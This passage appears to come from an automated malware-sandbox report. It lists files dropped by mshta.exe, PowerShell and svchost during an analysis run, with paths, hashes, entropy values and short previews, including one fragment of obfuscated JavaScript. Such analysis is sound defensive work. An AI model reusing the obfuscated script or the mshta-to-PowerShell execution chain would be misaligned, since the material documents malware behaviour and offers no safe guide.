                                                                                                                                                                                                SHA-512:EF25C8B706C07A8EFFC825DD61F90E09089FFE6B7FDD68D8F6519A74645AA16D90E8755A1BE9376B0CE6FF9C0A1B121CCB2E5DF11A2A64D36571DA321D4C7E87
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/l/font?kit=KFOmCnqEu92Fr1Mu4mxO&skey=a0a0114a1dcab3ac&v=v32);.}.

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\css[2].css

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):269
                                                                                                                                                                                                Entropy (8bit):5.4039002555919105
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:0IFFm15+56ZRWHMVg5qh7izlpdUD4uFl8vpAtCIif0RHC:jFMO6ZRoMmqt6pSZE6tCrf0Ri
                                                                                                                                                                                                MD5:7FC3E5F9AB982EFC1445BA615052C8F6
                                                                                                                                                                                                SHA1:B3EB66820ACFF0CED9AB6033E1E86DEA43282AE7
                                                                                                                                                                                                SHA-256:4876782FF4D220CF98989E30158CD4C0FDBE290333C10EA9EB2ED1814E17D6EB
                                                                                                                                                                                                SHA-512:8435D079521681B9B639B5B494C72E5C5C31A27402E4160251BBDACC16A00970609911552D956A846033CBFDF60DCC725DD04707DA74B9E4024CCF10CF7563B9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: normal;. font-display: swap;. src: url(https://fonts.gstatic.com/l/font?kit=memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVY&skey=62c1cbfccc78b4b2&v=v40);.}.

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\redirect[1].js

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65468)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):87787
                                                                                                                                                                                                Entropy (8bit):5.282258763551151
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:Sqeo1GzGM+7TWaxsZGSJRgO1vVakaGSUUMOE6MLBvhTut5TEm3/f3CfxYgPDK:SrfgOjaAv/TutVtAYgrK
                                                                                                                                                                                                MD5:399EAF833AC5F607B305C4ACE0C25EB5
                                                                                                                                                                                                SHA1:07A18A0A451B4DDE777BAC1E148BB8062CA05F05
                                                                                                                                                                                                SHA-256:9AC92DD22B771410A6944726D1ED1FD7A7FAAF239C2D80EAB0BC1233E6CE95D2
                                                                                                                                                                                                SHA-512:986F60E07A6B6084B72807785804F77F4AA04B727951EDD0D3A394D2A493EB95F5C774AD93D25B9B80C3ABE0A3A63DF6940472577AE4889DED92565F8D4DA38D
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:/*! For license information please see redirect.js.LICENSE.txt */.(()=>{var e={9755:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return n(e)}:n(t)}("undefined"!=typeof window?window:this,(function(r,i){"use strict";var o=[],a=Object.getPrototypeOf,s=o.slice,u=o.flat?function(e){return o.flat.call(e)}:function(e){return o.concat.apply([],e)},l=o.push,c=o.indexOf,f={},p=f.toString,d=f.hasOwnProperty,h=d.toString,g=h.call(Object),v={},y=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},m=function(e){return null!=e&&e===e.window},x=r.document,b={type:!0,src:!0,nonce:!0,noModule:!0};function w(e,t,n){var r,i,o=(n=n||x).createElement("script");if(o.text=e,t)for(r in b)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function T(e){return nul

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\69489[1].js

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):5
                                                                                                                                                                                                Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:RFB:jB
                                                                                                                                                                                                MD5:65516557CB9BADEB82E2D23C7124AACC
                                                                                                                                                                                                SHA1:8769FD31DA0ABB39808A286EC53E10185B5671E4
                                                                                                                                                                                                SHA-256:BA877D3E27D5F80BD52246F193466BF2E2BF0D321CA73FEE4B8DB6F921F18D3B
                                                                                                                                                                                                SHA-512:93E78C736B99F2F18CD1999C9C0DF5D80705D3F3BDD80C89A4803803A03ECB246C49D4D24011D8DBFFAE2CBBE7CB920F12B6E9CF614E9DC0A280167BC1CE70A2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:// ie

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\code[1].js

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (756)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):47083
                                                                                                                                                                                                Entropy (8bit):5.509765550386575
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:fVatQvbpXRlxOKXESy8PvWzTDOAs/z+SGY+:UcbKkjxIU+
                                                                                                                                                                                                MD5:CB15388BE80F1A0553D49CEAF5B65B65
                                                                                                                                                                                                SHA1:FA14751DEECC523AABB68AA696AE31BA249B3E63
                                                                                                                                                                                                SHA-256:557F3D629CBF8C40716F4C9D7C0147DC3F904AB7BC90B75B43BDF46FF79AAD51
                                                                                                                                                                                                SHA-512:E5AC7392E3E1CC5580FF84F1971DF3E7F3EF25E544EBA7271AB7B694C814512698F79B8350C24FFFA0C8007DEB65647ECC9E938961686457BF4EC20F910523F2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:var _tmr=_tmr||[];.(function(){function Jb(a){!va&&"number"===typeof a&&(va=a);return N&&Kb&&gb?(hb=[Kb-N,gb-N,Sa?Sa-N:null,Ta?Ta-N:null,va?va-N:null].join("/"),Sa&&(Ta&&va)&&(Jb=function(){return hb}),hb):null}function r(a,b,c){a.addEventListener?a.addEventListener(b,c,!1):a.attachEvent&&a.attachEvent("on"+b,c)}function L(a,b,c){a.removeEventListener?a.removeEventListener(b,c,!1):a.detachEvent&&a.detachEvent("on"+b,c)}function Lb(a,b){try{if(a.nodeName.toLowerCase()===b.toLowerCase())return a;if(a.parentNode)return Lb(a.parentNode,b)}catch(c){s&&.console.warn("[TopMailRu] Error#1.25",c)}return null}function Mb(a,b){if(null===a.offsetParent||(0==a.offsetHeight||0==a.offsetWidth||0==a.clientHeight||0==a.clientWidth)||b&&(0==a.offsetLeft||0==a.offsetTop))return!1;if(void 0!==f.getComputedStyle){var c=f.getComputedStyle(a,null);return"none"!==c.display&&"hidden"!==c.visibility}return!0}function Nb(a,b){for(var c=0,d=b.length;c<d;c++)if(b[c]===a)return!0;return!1}function da(a,b){for(var c

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\font[1].eot

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:Embedded OpenType (EOT), Open Sans family
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):19820
                                                                                                                                                                                                Entropy (8bit):7.966134830626345
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:1LMA1i7YSU38K745ZSrRLEovU+QgYAG1WcSUQfdoVBf:1QAVS+8muMeFT1WYeiDf
                                                                                                                                                                                                MD5:A72B62DCE1A4C54233F7CBEA19E22901
                                                                                                                                                                                                SHA1:B8A1A74D75444232DC98B86883FC2F0732863BA3
                                                                                                                                                                                                SHA-256:44E61F23098B72EB92F954E5A76E5E5059EC222A744DF3A00CB189E29EFD6E22
                                                                                                                                                                                                SHA-512:9C492FB472BFBDF2479B5F1CD47856C3DC3129109CD043EE2FE3C1A49908E95450F072BEBC8CF8F7C17C63FCE7830B8ABABD5CD24F165743D0CE43DEA5AE2175
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:lM...L............................LPg.......(...............Z.u.....................O.p.e.n. .S.a.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .3...0.0.3...".O.p.e.n. .S.a.n.s. .R.e.g.u.l.a.r.....BSGP.....................C..I..2\....c.W.h1.7.8...2.+..s....oM.-..H.mI+r.f*I..n4.""...j...X}.u..1.7..8.......e..#.1....q...g..L.&y..#uPA.....6"y.ycT..d...$.kY.......Z2.-....@..-..CU.m.OF.Gk..<.i.w..Z...A.c..,......6.~Q......E.....o......k.T..6...Fg{..0.d..X.......^.;........2.....!....m....lJ.NL.. ..pHX....Zt.-..C....xb.N>.7...../.rX.`!~.8......6....b'.4>..%.."~... ......Y]MH.!...|w.....1[.XrX....Q..p..@.#..T.....c..\..h5....%b.@..vd.t....E]"..Hb...T.{...>/..|.Pb)!U..Q....q%&...\..ZN.j._ATO......ci.......].....P*<..).u..V.+...u..(.-j.Mk.$Z.D....Z....:a...s...|Y..^+.l..)...K..M..-p~.\...zN&X...]9F....Q......[..b.nS.Z.79\.s3.._b..,\.\O!...T".e.....4)...o..7$.......-}.|..{....}..d..dA7..Bt.....~Z....M..`.O+..4...$.4....Z..l...|.y..."..k!..70f.LG..{c...x.].KHMHP

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\warning[1]

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1062
                                                                                                                                                                                                Entropy (8bit):4.517838839626174
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                                MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                                SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                                SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                                SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\context[1].js

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (65491)
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):385168
                                                                                                                                                                                                Entropy (8bit):5.548387483015651
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:4t4AjmDmm4bDM9jrl4PE4VzLEDDfICoq/Cn7o3:ajEmm4bDMRl4PE2YDTCn7o3
                                                                                                                                                                                                MD5:44A425B5FBBF17620D258EB0256B9AC3
                                                                                                                                                                                                SHA1:96B8B8FC32763C391531755038F30E5958B7EDA5
                                                                                                                                                                                                SHA-256:B9F55C280ED4394F6194C529F025165EEB573440C0DB8BFB773D6E2B04EBB102
                                                                                                                                                                                                SHA-512:C061753FC6865837069FFD1EE8749321A64C0A1A44E34ED36DFED122452BD79B2954EE84C60B1FAD47B5781FF2F69BB3A79106FBB9E48561F93F36ED56F31439
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:/*! v:1176431 b:default c:loaders/context */.try{var cnc=function(e){if(!e||!e.toString)return!1;const t=e.toString();return/\[native code\]/.test(t)||/\/\* source code not available \*\//.test(t)};cnc(Function.prototype.bind)?Function.prototype.__pbind=Function.prototype.bind:Function.prototype.__pbind=function(e,...t){let n=this;return function(...r){return n.apply(e,[...t,...r])}},cnc(Array.prototype.reduce)?Object.defineProperty&&Object.defineProperty(Array.prototype,"__preduce",{enumerable:!1,iterable:!1,value:Array.prototype.reduce}):Object.defineProperty(Array.prototype,"__preduce",{enumerable:!1,iterable:!1,value:function(e){if(null==this)throw new TypeError("Array.prototype.reduce called on null or undefined");if("function"!=typeof e)throw new TypeError(e+" is not a function");var t,n=Object(this),r=n.length>>>0,o=0;if(arguments.length>=2)t=arguments[1];else{for(;o<r&&!(o in n);)o++;if(o>=r)throw new TypeError("Reduce of empty array with no initial value");t=n[o++]}for(;o<r;o+

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\error[1]

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1706
                                                                                                                                                                                                Entropy (8bit):5.274543201400288
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                                MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                                SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                                SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                                SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\font[1].eot

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:Embedded OpenType (EOT), Roboto family
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21310
                                                                                                                                                                                                Entropy (8bit):7.965851537893325
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:BEpMVC21y38hc0tombclQa+kQZ3AqrthiUzs9EickU5I2czKe3oH1Stap4:FVCzicpeaaKqrriAim5JczP4HEg4
                                                                                                                                                                                                MD5:0777A08C974B6E1714A233493BFD26D2
                                                                                                                                                                                                SHA1:AC3584466B9FA8643038F94CB75E73779D28448F
                                                                                                                                                                                                SHA-256:EB39019A7B3F5E99681081CA3B5730D747A65690CD0A1B761C52DF9C4746172F
                                                                                                                                                                                                SHA-512:AA06ADC8B1CB75E9342B426C4596FAC55F43E1DB01F7B1FE472888102AC95C1A242277817010AF8D8240E86321267DBB1A2AC26EDACEFD6C7E3CC6812910F325
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:>S..zR............................LPg...K... .......... ....B.|.....................R.o.b.o.t.o.....R.e.g.u.l.a.r...&.V.e.r.s.i.o.n. .2...1.3.7.;. .2.0.1.7.....R.o.b.o.t.o.....BSGP..................~@.?..@X.1 ....c.W.h1.7.8...2.+.......o..{..H.mI+~.f-..n4."o.7..#&.......B.w....vh.c.a..(......W.f<..F..k.$..f....{..? )?....U.U.. .....!......U.alaAZ..f..^zc.D..P.T.t......~.0X....&.w...b.|..x..%..z.z..m4..H...Eog.6..,.#.LRG........(y.....>#(H.#..DU9...!.....z*M..+...S..".....H.......O...Sv?k..p)."..d....Y!."Rf... .j`..`...2..)......*...W....p..`.{O.k..U*..#..3.>.7B.(.[y.ny..8........1...R.!..L!..........u..A9..S0.t^3n.(......G. =...>y..w..f..U.......B...h..)X.Z;.*.d.)!.[....;1......;N.#.1.`.......W.af..IW..H.....D.....JxB......p.9..6....Z.KHeZ.D)..L.@....t/2;...dq...\.v'I...75.P...|....B.H......Y...W..E..5.z.-7....C......8..FAV..iv...D...S.....g....F.mTQ.B ..........!..k>..@.27.)c....Y>.#..Q.k.T7.C.>s..{.%..H.X...H.|..;..w.cV..V4.C.H*...H.v.....l.(...

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\rp-cl-ob[1].js

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65516), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):95288
                                                                                                                                                                                                Entropy (8bit):5.095296892412143
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:uHAe0B9vqJOm1UTLF2ZU36bybdrHpaM2PLgPchRETioNm637Ec3exeDr6u60IJ:uge0aJO2UV2ZUqboMMSLcgRETiofrz7q
                                                                                                                                                                                                MD5:4EB2C767F3BC7992A918BE3558D2A0A4
                                                                                                                                                                                                SHA1:B135A048D3183C49D9D1C5200F3F545AF57FF12D
                                                                                                                                                                                                SHA-256:1083E15F17276402D259F207D321498179DAC9996221D7945AC21055BB7BF2F4
                                                                                                                                                                                                SHA-512:92E2094FF2E64F6EBB8F2D11296048E2E0153BD8377B40CC570A388F89032A3D279E344FC44811F0B5447D9D24FA42ED7A770EA4246BBA41BD6A5F48C340FD28
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:(function(_0x31c704,_0x2e099c){function _0x41606a(_0x5587de,_0x3a321d,_0x1768ac,_0x19eb3c){return _0x1152(_0x3a321d-0x1c6,_0x1768ac);}const _0x351b0c=_0x31c704();function _0xe9d3c0(_0x20373d,_0x4f8025,_0x3008a0,_0x5d1f47){return _0x1152(_0x5d1f47-0x387,_0x20373d);}function _0x560ba2(_0x650260,_0x13ce96,_0x5c3a64,_0x3a99ae){return _0x1152(_0x13ce96- -0x143,_0x650260);}while(!![]){try{const _0x2fcf7d=-parseInt(_0x41606a(0x38f,0x3b3,0x43d,0x29e))/(-0x1bb+0x127c+-0x10c0)*(-parseInt(_0x41606a(0x43d,0x35e,0x23a,0x35f))/(-0x1*0x79b+-0xaaa+-0x1*-0x1247))+parseInt(_0x560ba2(0x1af,0xf4,0x103,0x58))/(0xa46+-0x1*0x866+-0x1dd)+parseInt(_0x41606a(0x39c,0x40c,0x346,0x4c7))/(-0x70*0x55+-0x1aec+0x4020)+-parseInt(_0x41606a(0x51b,0x495,0x40e,0x3da))/(0x2183+0x3ec*0x5+-0x1*0x351a)*(parseInt(_0x41606a(0x601,0x512,0x4a1,0x54b))/(-0x568*-0x2+0x25ef+-0x30b9*0x1))+-parseInt(_0x41606a(0x3d3,0x4c0,0x451,0x453))/(0x622+-0x52d+-0x2*0x77)+-parseInt(_0x560ba2(0x123,0x1da,0x243,0xe8))/(0x6*-0x175+0x586*0x4+0x9b*-0x16

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\warning[1]

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1062
                                                                                                                                                                                                Entropy (8bit):4.517838839626174
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                                MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                                SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                                SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                                SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                Entropy (8bit):0.773832331134527
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Nlllulqllll/:NllUql/
                                                                                                                                                                                                MD5:49FAEE31B2AE8B15DA007BA9D5577E99
                                                                                                                                                                                                SHA1:DE0C238EAED882225C0057884A0524C60CBBF35D
                                                                                                                                                                                                SHA-256:518A64E432AF799C48413F1EBDB4249F810C00BAE3ADD0C0CC34BDA3AF9B6C81
                                                                                                                                                                                                SHA-512:324B7C72B7598A81BACDE122AF35CD72BB4CEAE2A43A03F11D7DB5D570BAA88DF7811F3E451285537CE6F770C21DE3392DBBB10CFD9A29CD30D4BE88DA6275DE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lucqptv.ol0.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4o02dsmm.dhr.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nevmepv5.klf.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3m2c05m.xv5.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                Encrypted:false
